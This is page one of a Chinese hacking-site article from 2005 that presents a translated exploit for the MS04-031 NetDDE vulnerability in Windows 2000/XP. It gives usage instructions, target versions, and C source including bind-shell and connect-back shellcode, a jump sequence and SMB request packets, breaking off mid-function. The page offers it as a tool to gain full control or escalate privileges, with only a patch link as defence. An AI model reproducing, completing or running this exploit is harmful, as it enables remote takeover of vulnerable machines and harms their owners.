您的位置:积木首页 >> 黑客技术频道 >> 黑客工具 >> 正文:
标题:MS04031漏洞漏洞程序演示版
时间:2005-1-2 来源:不详 浏览数:

翻译:小花  来自:http://xiaohuar.blogchina.com/

我从国外网站找到的,把英文简单翻译了一下,用我的话,呵呵。

此程序是MS04031的漏洞利用程序,成功利用此漏洞可以完全控制目标系统,获得管理权限。

程序是针对MS NETDDE的攻击程序。

但是因为该服务默认情况下是关闭的,所以我们能远程利用该漏洞的成功率很小。

然后,这为我们本地权限提升提供了一个很好的方式。

如何防范:

请用户尽快打补丁: 
*  http://www.microsoft.com/technet/security/Bulletin/MS04-031.mspx 

 

Tested on: 
*    - Windows XP Professional SP0 
*    - Windows XP Professional SP1 
*    - Windows 2000 Professional SP2 
*    - Windows 2000 Professional SP3 
*    - Windows 2000 Professional SP4 
*    - Windows 2000 Advanced Server SP4 
 

程序使用许可

这是一个演示版本,只有被授权的用户才能使用它(跟我们没关系,外国人和我们法律不一样啊)

命令行参数:

HOD-ms04031-expl.exe <host> <netbios name>  <target> <bindport> 
*                        [connectback IP] [options] 
 host 目标主机

netbios name这个我们开始是不清楚的,需要用到-f参数

首先 expl.exe 192.168.0.1 -f

得到netbios name

target 目标系统版本 慢慢试,不过2000和XP应该很好区分

bindport 目标打开端口,用于我们连接用,也可以反向连接,不再介绍。

 

代码如下:
 

/* #define _WIN32 */ 
 
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
 
#ifdef _WIN32 
#include <winsock2.h> 
#pragma comment(lib, "ws2_32") 
#else 
#include <sys/types.h> 
#include <netinet/in.h> 
#include <sys/socket.h> 
#endif 
 
 
/* targets table */ 
struct targets { 
int num; 
char name[50]; 
long jmpaddr; 

target[]= { 
{ 0, "WinXP [universal] ", 0x00abfb1c - 0x20 }, 
{ 1, "Win2K [universal] ", 0x009efb60 - 0x20 } 
}; 
 
 
/* portbind shellcode */ 
unsigned char portbindsc[] =  
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c" 
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b" 
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78" 
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b" 
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03" 
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b" 
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c" 
"\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4" 
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3" 
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70" 
"\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6" 
"\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e" 
"\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83" 
"\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32" 
"\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59" 
"\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50" 
"\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50" 
"\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14" 
"\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc" 
"\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c" 
"\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33" 
"\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44" 
"\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d" 
"\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50" 
"\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55" 
"\x28\xff\x55\x0c"; 
 
 
/* connectback shellcode */ 
unsigned char connectbacksc[] =  
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c" 
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b" 
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78" 
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b" 
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03" 
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b" 
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c" 
"\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4" 
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3" 
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa" 
"\x60\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02" 
"\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x45\xff\xff\xff\x8b\xd0\x83" 
"\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\xa5\xff\xff\xff\x83" 
"\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc" 
"\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8" 
"\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90" 
"\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50" 
"\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0\x68\x7f\x01\x01\x01\xb8" 
"\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50\x53\x56" 
"\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa" 
"\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab" 
"\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50" 
"\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff" 
"\x77\x38\xff\x55\x20\xff\x55\x0c"; 
 
 
#define SET_PORTBIND_PORT(buf, port) *(unsigned 
short *)(((buf)+300)) = (port) 
#define SET_CONNECTBACK_IP(buf, ip) *(unsigned 
long  *)(((buf)+283)) = (ip) 
#define SET_CONNECTBACK_PORT(buf, port)
*(unsigned short *)(((buf)+290)) = (port) 
 
 
/*  
   eax = target[].jmpaddr -> stack -> jmpcode -> shellcode 
 
   1. 0100D605   call        dword ptr [eax+20h] 
   2. jmpcode 
   3. shellcode 
*/ 
 
char jmpcode[] = 
"\x90\x90\x90\x90\x66\x81\xC7\x20\x03\xFF\xE7\x90\x90\x90\x90\x90" 
"\x50\x6f\x43\x20\x66\x6f\x72\x20\x4e\x65\x74\x44\x44\x45\x20\x28" 
"\x4d\x53\x30\x34\x2d\x30\x33\x31\x29\x2e\x20\x43\x6f\x70\x79\x72" 
"\x69\x67\x68\x74\x20\x28\x63\x29\x20\x32\x30\x30\x34\x2d\x32\x30" 
"\x30\x35\x20\x68\x6f\x75\x73\x65\x6f\x66\x64\x61\x62\x75\x73\x2e" 
"\xBB\xBB\xBB\xBB" /* => eax */ 
"PADPAD"; 
 
char smb_sesreq[] = 
"\x81\x00\x00\x44\x20\x43\x4b\x46\x44\x45\x4e\x45\x43\x46\x44\x45" 
"\x46\x46\x43\x46\x47\x45\x46\x46\x43\x43\x41\x43\x41\x43\x41\x43" 
"\x41\x43\x41\x43\x41\x00\x20\x45\x4b\x45\x44\x46\x45\x45\x49\x45" 
"\x44\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43" 
"\x41\x43\x41\x43\x41\x41\x41\x00"; 
 
char smb_negotiate[] = 
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00" 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5c\x02" 
"\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e" 
"\x31\x32\x00"; 
 
char d1[] = 
"\x0d\x12\x0b\x06\x0d\x18\x1c\x01\x10\x03\x12\x08\x1d\x1f\x0a\x0a" 
"\x16\x02\x17\x0e\x1b\x0d"; 
 
char req1[] = 
"\x81\x00\x00\x44"; 
 
char req2[] = 
"CACACACACACACACACACACACACACACABP"; 
 
char h1[] = 
"\x45\x44\x44\x4E\x00\x00\x00"; 
 
char h2[] = 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
 
char h3[] = 
"\x00\x00\x02\x02\x00\x00\x00\x01\x00\x00\x00"; 
 
 
unsigned long ndlen = 0; 
unsigned long ntarget = 0; 
unsigned long backip = 0; 
unsigned short bindport = 0; 
 
 
 
unsigned long 
fixx(unsigned char *data, unsigned long i) 

unsigned long len; 
 
len = (data[i+3]<<24) + 
(data[i+2]<<16) + 
(data[i+1]<<8) + 
(data[i]); 
 
return len; 

 
 
unsigned long 
chksum(unsigned char *data, unsigned long dlen) 

unsigned long i, len; 
unsigned long chk; 
 
chk = 0xFFFFFFFF; 
len = dlen - 4; 
 
for (i=0; i<len; i+=4) 
chk += fixx(data, i); 
 
while (i < dlen) { 
chk += (unsigned char)data[i]; 
i++; 

 
return chk; 

 
 
char * 
netbios_encode(char *ndata, char service) 

char *tmpdata, *data, *nret; 
unsigned long dlen; 
char odiv, omod, o; 
int i; 
 
data = (char *)calloc(17, 1); 
memcpy(data, ndata, strlen(ndata)); 
 
dlen = strlen(data); 
while (dlen < 15) { 
strcat(data, "\x20"); 

[1] [2] [3] 下一页


(责任编辑:笑虎)
最近更新
今日推荐
热点文章